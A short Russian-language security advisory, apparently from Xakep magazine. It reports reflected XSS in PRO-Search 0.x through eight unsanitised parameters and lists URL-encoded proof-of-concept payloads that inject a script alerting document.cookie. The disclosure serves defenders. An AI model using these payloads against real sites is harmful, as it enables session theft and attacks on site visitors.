Хакер #305. Многошаговые SQL-инъекции
Программа: PRO-Search 0.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "prot", "host", "path", "name", "ext", "size", "search_days" и "show_page". Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
http://site/?prot=%22%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E
http://site/?host=%22%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E
http://site/?path=%22%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E
http://site/?name=%22%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E
http://site/?ext=%22%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E
http://site/?size=%22%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E
http://site/?search_days=%22%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E
http://site/?show_page=%27%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E